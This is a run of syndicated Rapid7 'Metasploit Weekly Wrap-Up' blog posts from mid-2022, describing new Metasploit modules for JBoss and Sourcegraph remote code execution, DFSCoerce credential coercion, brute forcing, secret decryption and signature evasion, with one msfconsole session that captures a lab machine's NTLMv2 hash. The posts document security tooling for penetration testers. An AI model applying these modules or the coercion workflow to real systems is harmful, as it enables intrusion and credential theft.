LDAP Query and Enumeration Module by Grant Willcox – This adds a generic module to perform LDAP queries. Users can execute custom queries either through configuration files on disk, or through a combination of datastore options. The module also includes multiple builtin queries for common operations.

Enhancements and features (7)

#16737 from adfoster-r7 – This removes the code duplication in the MSSQL client mixins and refactors the code into a single main mixin.
#16754 from bcoles – Adds additional offsets for various Windows 2000 Professional targets in the ms02_065_msadc module. Also adds documentation and notes.
#16761 from bcoles – Adds additional offsets for various Windows 2000 targets, replaces raw socket TCP with HttpClient, fixes default payload, adds docs and notes.
#16776 from bcoles – Adds a ftp-http command stager for FTP clients which support http(s) URLs via set cmdstager::flavor ftp_http.
#16778 from bcoles – The checkvm script at ./scripts/meterpreter/checkvm.rb has been removed and post/windows/gather/checkvm.rb now replaces it. Additionally, the post/windows/gather/checkvm.rb script has been updated to include missing features from ./scripts/meterpreter/checkvm.rb to ensure backwards compatibility.
#16789 from adfoster-r7 – This adds OpenSSL version information to the report generated by the debug command.
#16792 from adfoster-r7 – This improves support for various OpenSSL 3 related errors during console start.

Bugs fixed (2)

#16743 from adfoster-r7 – Fixes a crash when using the scanner/mssql/mssql_login module with the tdsencryption and USE_WINDOWS_AUTHENT options set to true.
#16753 from bcoles – This PR fixes several bugs present in the module, including shifting from Meterpreter to shell payloads, better checking, and added targets anddocumentation.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

Metasploit Weekly Wrap-Up

2022-07-15 Grant Willcox

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2022/07/15/metasploit-weekly-wrap-up-166/

JBOSS EAP/AS – More Deserializations? Indeed!

Metasploit Weekly Wrap-Up

Community contributor Heyder Andrade added in a new module for a Java deserialization vulnerability in JBOSS EAP/AS Remoting Unified Invoker interface for versions 6.1.0 and prior. As far as we can tell this was first disclosed by Joao Matos in his paper at AlligatorCon. Later a PoC from Marcio Almeida came out that Heyder Andrade used as the basis for his Metasploit module. The exploit allows an unauthenticated attacker with network access to JBOSS EAP/AS <= 6.1.0 Remoting Unified Invoker interface to gain RCE as the user jboss by sending a crafted serialized object to this interface.

Deserialization attacks have certainly been quite popular as of late but we haven’t seen many in JBOSS lately so we appreciate the efforts of these contributors to provide us with some alternative deserialization attacks 🙂

More Unauthenticated RCEs – Sourcegraph gitserver sshCommand RCE

One unauthenticated RCE is nice for a weekly wrapup, but we can always do better. Why not make it two this week? Courtesy of Spencer McIntyre and Altelus1‘s PoC, we now have a Metasploit module for CVE-2022-23642, an unauthenticated RCE in Sourcegraph Gitserver prior to 3.37.0 that allows attackers to execute arbitrary OS commands by modifying the core.sshCommand value within the git configuration. Successful exploitation will allow an unauthenticated attacker to execute commands in the context of the Sourcegraph Gitserver server.

This is another cool attack, as we don’t often see these types of configuration-related issues leading to unauthenticated RCE; typically when they do crop up, there are limitations on what one can do. However in this case we ended up with a full RCE as an unauthenticated user, which goes to show that even less common or more frequently overlooked issues under the right scenario can be exploited to gain privileged access.

Decrypting Ya Secrets – Citrix Netscaler Secrets Decrypter

Finally, community contributor npm-cesium137-io added a new module to decrypt Citrix Netscaler appliance configuration files and recover secrets encrypted with the KEK encryption scheme, provided you have the key fragment files.

We have heard both from npm-cesium137-io and others that Citrix Netscaler has been seen on a number of pen testing engagements so hopefully this module should assist those pen testing these environments by allowing them to more easily obtain secrets during their engagements.

New module content (3)

Decrypt Citrix NetScaler Config Secrets by npm-cesium137-io – This auxiliary module allows users to decrypt secrets in Citrix NetScaler appliance configuration files.
Sourcegraph gitserver sshCommand RCE by Altelus1 and Spencer McIntyre, which exploits CVE-2022-23642 – This module leverages an unauthenticated RCE in Sourcegraph’s gitserver component which results in OS command execution in the context of gitserver.
JBOSS EAP/AS Remoting Unified Invoker RCE by Heyder Andrade, Joao Matos, and Marcio Almeida – This module exploits a Java deserialization vulnerability in JBOSS EAP/AS Remoting Unified Invoker interface for versions 6.1.0 and prior.

Enhancements and features (2)

#16735 from ErikWynter – This change sets the MeterpreterTryToFork advanced payload option to true by default for the Linux target in the aerohive_netconfig_lfi_log_poison_rce module to prevent the application from hanging once exploited.
#16764 from bcoles – Adds two new HTTP client evasion options to msfconsole HTTP::shuffle_get_params, and HTTP::shuffle_post_params that allow users to randomize the order of the POST and GET parameters to evade static signatures.

Bugs fixed (5)

#16617 from NikitaKovaljov – This fixes a race condition that was present in the ipv6_neighbor module that caused hosts to be missed when the scanned range was very short due to an adaptive timeout with an insufficient floor value.
#16703 from e2002e – This fixes compatibility issues with the Censys V2 API and the censys_search.rb module.
#16718 from cdelafuente-r7 – This fixes the run_as library and module to work correctly on 64-bit systems.
#16727 from bcoles – Modules that use the tftp command stager fail due to a missing tftphost option. This ensures that the tftphost host is set and valid before proceeding with creating the command stager.
#16736 from ErikWynter – This change fixes a bug in the confluence_widget_connector exploit module to prevent it from crashing when the HTTP response body received in the get_java_property method is empty or does not match expected regex.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

Metasploit Weekly Wrap-Up

2022-07-08 Dean Welch

Post Syndicated from Dean Welch original https://blog.rapid7.com/2022/07/08/metasploit-weekly-wrap-up-165/

DFSCoerce – Distributing more than just files

Metasploit Weekly Wrap-Up

DFS (Distributed File System) is now distributing Net-NTLM credentials thanks to Spencer McIntyre with a new auxiliary/scanner/dcerpc/dfscoerce module that is similar to PetitPotam in how it functions. Note that unlike PetitPotam, this technique does require a normal domain user’s credentials to work.

The following shows the workflow for targeting a 64-bit Windows Server 2019 domain controller. Metasploit is hosting an SMB capture server to log the incoming credentials from the target machine account:

msf6 > use auxiliary/server/capture/smb 
msf6 auxiliary(server/capture/smb) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/capture/smb) > 
[*] Server is running. Listening on 0.0.0.0:445
[*] Server started.
msf6 auxiliary(server/capture/smb) > use auxiliary/scanner/dcerpc/dfscoerce 
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set RHOSTS 192.168.159.96
RHOSTS => 192.168.159.96
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBUser aliddle
SMBUser => aliddle
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBPass Password1
SMBPass => Password1
msf6 auxiliary(scanner/dcerpc/dfscoerce) > run
[*] 192.168.159.96:445    - Connecting to Distributed File System (DFS) Namespace Management Protocol
[*] 192.168.159.96:445    - Binding to \netdfs...
[+] 192.168.159.96:445    - Bound to \netdfs
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client     : 192.168.250.237
[SMB] NTLMv2-SSP Username   : MSFLAB\WIN-3MSP8K2LCGC$
[SMB] NTLMv2-SSP Hash       : WIN-3MSP8K2LCGC$::MSFLAB:971293df35be0d1c:804d2d329912e92a442698d0c6c94f08:01010000000000000088afa3c78cd801bc3c7ed684c95125000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f0055005000070008000088afa3c78cd80106000400020000000800300030000000000000000000000000400000f0ba0ee40cb1f6efed7ad8606610712042fbfffb837f66d85a2dfc3aa03019b00a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003200350030002e003100330034000000000000000000
[+] 192.168.159.96:445    - Server responded with ERROR_ACCESS_DENIED which indicates that the attack was successful
[*] 192.168.159.96:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/dcerpc/dfscoerce) >

FreeSwitch Brute Force Login

A returning contributor krastanoel has brought us a module for brute forcing the login credential for the FreeSWITCH event socket service.
This is even simpler to use than our usual login scanner modules since there’s no need to determine or brute force a username — only the password is required!

New module content (2)

DFSCoerce by Spencer McIntyre, Wh04m1001, and xct_de – This adds a scanner module that implements the dfscoerce technique. Although this technique leverages MS-DFSNM methods, this module works similarly to PetitPotam in that it coerces authentication attempts to other machines over SMB. This ability to coerce authentication attempts makes it particularly useful in NTLM relay attacks.
FreeSWITCH Event Socket Login by krastanoel – This adds an auxiliary scanner module that brute forces the FreeSwitch’s event socket service login interface to guess the password.

Enhancements and features (1)

#16716 from bcoles – This updates HTTP Command stagers to expose the CMDSTAGER::URIPATH option, so users can choose where to host the payload when using a command stager.

Bugs fixed (3)

#16704 from gwillcox-r7 – This fixes an issue when targeting some faulty memcached servers that return an error when extracting the keys and values stored in slabs. The module no longer errors out with a type conversion error.
#16724 from bcoles – This updates and fixes the exploit/windows/iis/ms01_026_dbldecode module. It now uses the standard HttpClient, the TFTP stager has been fixed, and Meterpreter specific code has been removed since Meterpreter is not available on Server 2000 systems since Metasploit v6.
#16731 from space-r7 – Fixes a logic bug in the process API that would cause additional permissions to be requested than what was intended.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

Metasploit Weekly Wrap-Up

2022-07-01 Grant Willcox

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2022/07/01/metasploit-weekly-wrap-up-164/

SAMR Auxiliary Module

Metasploit Weekly Wrap-Up

A new SAMR auxiliary module has been added that allows users to add, lookup, and delete computer accounts from an AD domain. This should be useful for pentesters on engagements who need to create an AD account to gain an initial foothold into the domain for lateral movement attacks, or who need to use this functionality as an attack primitive.

Note when using this module that there is a standard number of computers a user can add, so be wary that you may get STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED error messages if you try to run this repeatedly. It should also be noted that whilst a standard user can create a computer account, you will need additional privileges to delete that account.

A Pesky Table Bug Gets Squashed

A well known bug in Rex-Tables when trying to render tables which contain unsupported characters has now been fixed in Rex-Text 0.2.38, which has now been pulled into the framework. This should solve a number of issues that have been reported over the last year such as https://github.com/rapid7/metasploit-framework/issues/15833, https://github.com/rapid7/metasploit-framework/issues/14955, and https://github.com/rapid7/metasploit-framework/issues/15044. It should also help improve experiences with some of the new LDAP work we have been working on lately, so that users should have a smoother experience once that releases.

PHP Mailer Argument Injection Module Improvements

As a final point of note, community contributor erikbomb has improved the PHP Mailer Argument Injection exploit targeting CVE-2016-10033 and CVE-2016-10045 to now support changing the name of the fields for the name, email, and message objects. This should allow this exploit to work under additional scenarios where these settings may need to be altered for the exploit to successfully run. Much thanks to erikbomb for these enhancements!

New module content (1)

SAMR Computer Management by JaGoTu and Spencer McIntyre – This adds an auxiliary module that can be used to add, lookup, and delete computer accounts from an active directory domain. The computer account can offer a sort of foothold into the domain for lateral movements or as a common attack primitive.

Enhancements and features (1)

#16721 from erikbomb – This updates the PHP Mailer Argument Injection exploit to allow setting the names of certain fields via advanced options. These configuration options then allow the exploit to work in additional scenarios.

Bugs fixed (2)

#16722 from bcoles – Fixes module metadata for stability and reliability.
#16729 from gwillcox-r7 – Fixes a crash in Metasploit’s console when trying to render tables which contain unsupported characters.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

Metasploit Weekly Wrap-Up

2022-06-24 Erran Carey

Post Syndicated from Erran Carey original https://blog.rapid7.com/2022/06/24/metasploit-weekly-wrap-up-163/

Add Windows target support for the Confluence OGNL injection module

Metasploit Weekly Wrap-Up

Improve the exploit/multi/http/atlassian_confluence_namespace_ognl_injection module to support Windows server targets.

EfsPotato – 6th getsystem technique

This adds the EfsPotato technique to the getsystem command in meterpreter. The new technique leverages the EFSRPC API to elevate a user if they have SeImpersonatePrivilege permissions enabled.

New module content (1)

#16676 from cdelafuente-r7 – Adds a new getsystem technique that leverages the EFSRPC API to elevate a user with the SeImpersonatePrivilege permission to NT AUTHORITY\SYSTEM. This technique is often referred to as "EfsPotato". It also improves the post module to use ACTIONS instead of the datastore TECHNIQUE for a simpler user interface when using info or show actions for this module, allowing a user to determine which techniques were available from inside msfconsole.

Enhancements and features (2)

#16650 from red0xff – This PR implements the method #read_from_file for PostgreSQL and MSSQL, and fixes the MySQL implementation. It also updates the test module to better handle multiline data returned from SQL queries.
#16692 from noraj – Updates various links to https://docs.metasploit.com

Bugs fixed (2)

#16597 from zeroSteiner – This fixes an issue with the encrypted shell payload stage that prevented it from being used with the new Powershell command adapter. In addition to this, a number of payload modules have been updated to include an opts hash as a parameter for compatibility.
#16680 from zeroSteiner – This PR adds support for Windows targets to the atlassian_confluence_namespace_ognl_injection module and fixes an issue where the check method would fail to properly identify that Windows targets were even vulnerable due to how the command was being executed.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

Metasploit Weekly Wrap-Up

2022-06-17 Grant Willcox

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2022/06/17/metasploit-weekly-wrap-up-162/

vCenter Secret Extracter

Metasploit Weekly Wrap-Up

Expanding on the work of the vcenter_forge_saml_token auxiliary module, community contributor npm-cesium137-io has added a new module for extracting the vmdir/vmafd certificates, the IdP keypair, the VMCA root cert, and anything from vmafd that has a private key associated, from an offline copy of the services database. This information can then be used with the vcenter_forge_saml_token module to gain a session cookie that grants access to the SSO domain as a vSphere administrator.

Great work by npm-cesium137-io to complete this exploit chain and provide users a full end to end solution to get administrative level privileges on a vCenter/vSphere server given an offline copy of the services database!

Named Pipe Pivoting Documentation Updates

Historically speaking named pipe pivoting has been an area of much confusion among users. We have taken note of this and thanks to some help from adfoster-r7 and bwatters-r7, we have added in some documentation for using named pipe pivoting with Windows Meterpreter.

You can find this documentation online on our documentation site at https://docs.metasploit.com/docs/using-metasploit/intermediate/pivoting-in-metasploit.html. Note that since with Metasploit 6.2 our documentation now lives inside of the Metasploit codebase, which you can find at docs/metasploit-framework.wiki/Pivoting-In-Metasploit.md.

Service Library Improvements

Community contributor kalidor noticed that whilst testing a few modules that the Windows Services library we maintain was in need of some updates and was erroring out for him in a number of cases. This turned out to be due to some inappropriately thrown exceptions. After further consultation it was decided a rewrite of the code was needed which not only solved the original issue but also aligned the Windows Services library to more closely align with existing design patterns, ensuring it will be easier to maintain long term.

New module content (1)

VMware vCenter Extract Secrets from vmdir / vmafd DB File by npm – This module extracts the vmdir / vmafd certificates from an offline copy of the service database (i.e. a vCenter backup). Right now it will pull the IdP keypair, the VMCA root cert, and anything from vmafd that has a private key associated.

Enhancements and features (1)

#16654 from adfoster-r7 – This PR adds documentation for using named pipe pivoting with Windows Meterpreter.

Bugs fixed (3)

#16602 from kalidor – If a user restarted a service using lib/msf/core/post/windows/services.rb an exception would be thrown as a integer instead of as a string, which would cause an error to occur. This has been fixed by rewriting the code for the service_restart to use more appropriate logic. Additionally, the documentation has been updated for lib/msf/core/post/windows/services.rb to note which functions may throw exceptions.
#16627 from bwatters-r7 – The tools/modules/update_payload_cached_sizes.rb script has been updated to contain additional exception handling to appropriately handle any exceptions that may be thrown during runs, and then print out a list of those exceptions at the end of the run.
#16665 from adfoster-r7 – A missing import has been fixed in /tools/exploit/random_compile_c.rb, allowing it to now compile C files as expected.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub: